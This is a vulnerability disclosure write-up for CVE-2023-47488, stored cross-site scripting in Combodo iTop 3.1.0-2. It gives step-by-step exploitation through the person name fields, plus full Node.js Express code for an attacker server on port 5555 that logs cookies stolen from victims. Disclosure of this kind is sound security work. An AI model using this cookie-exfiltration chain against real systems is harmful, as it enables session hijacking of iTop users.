CVE-2023-47488
Product detail ⌗
Multiple cross-site scripting (XSS) vulnerabilities in Combode Top version 3.1.0-2-11973 built on 2023-08-02. allow user to inject the malicious script code which send get request along with the cookie to the attacker host via the parameter "attr_manager_id" in General information page, and parameter id on contact page.
Prerequisite ⌗
Install iTop from official Combodo Github repository GitHub page
data:image/s3,"s3://crabby-images/c3f0b/c3f0b6d71bc6595d8e8a8e35673ae235535715a8" alt=""
iTOP version 4.0.3 released on Aug 9
data:image/s3,"s3://crabby-images/dee50/dee500f253dc226b25f391408b2f6d31dcb44ea9" alt=""
Installed iTOP version 3.1.0-2
Exploitation ⌗
data:image/s3,"s3://crabby-images/36b3a/36b3a3cb2df3284babcaa2faedf2f30c18f1dd01" alt=""
1. Create a new person
data:image/s3,"s3://crabby-images/50d0e/50d0eac38e35ffde1cff681f63f75c0e3a6db7ef" alt=""
2. Use a basic XSS payload
data:image/s3,"s3://crabby-images/3e8b6/3e8b690fec24e34c1db2db790e65f4127881aee6" alt=""
3. The script executed for both of field which is Last Name and First Name.
data:image/s3,"s3://crabby-images/dbaaf/dbaaf38f0d885e4cae31a1405c18d547db195885" alt=""
data:image/s3,"s3://crabby-images/023f8/023f8064b3fb2dd95235297d092e68d7d50dcc49" alt=""
4. Host the attacker server on another port which is port 5555.
// Require express and create an instance of express app
const express = require('express');
const app = express();
// Define a port number
const port = 5555;
// Define a route for GET requests on '/'
app.get('/', (req, res) => {
// Extract the 'get' query parameter
const cookieData = req.query.get;
// Log the cookie data to the console
console.log('Received cookie data:', cookieData);
// Respond with a success message
res.send('Cookie data received');
});
// Start the server
app.listen(port, () => {
console.log(`Server listening at http://localhost:${port}`);
});
data:image/s3,"s3://crabby-images/81d25/81d25d96b5c72b9aa4c7d9a43b20553cff945507" alt=""
5. Use another XSS payload which send a get request to localhost port 5555 (attacker host).
As seen in the gif below, attacker obtain the cookie when victim click on the malicious person profile.
data:image/s3,"s3://crabby-images/def86/def8690d1c062d217fa11f95da5a87873cce4817" alt=""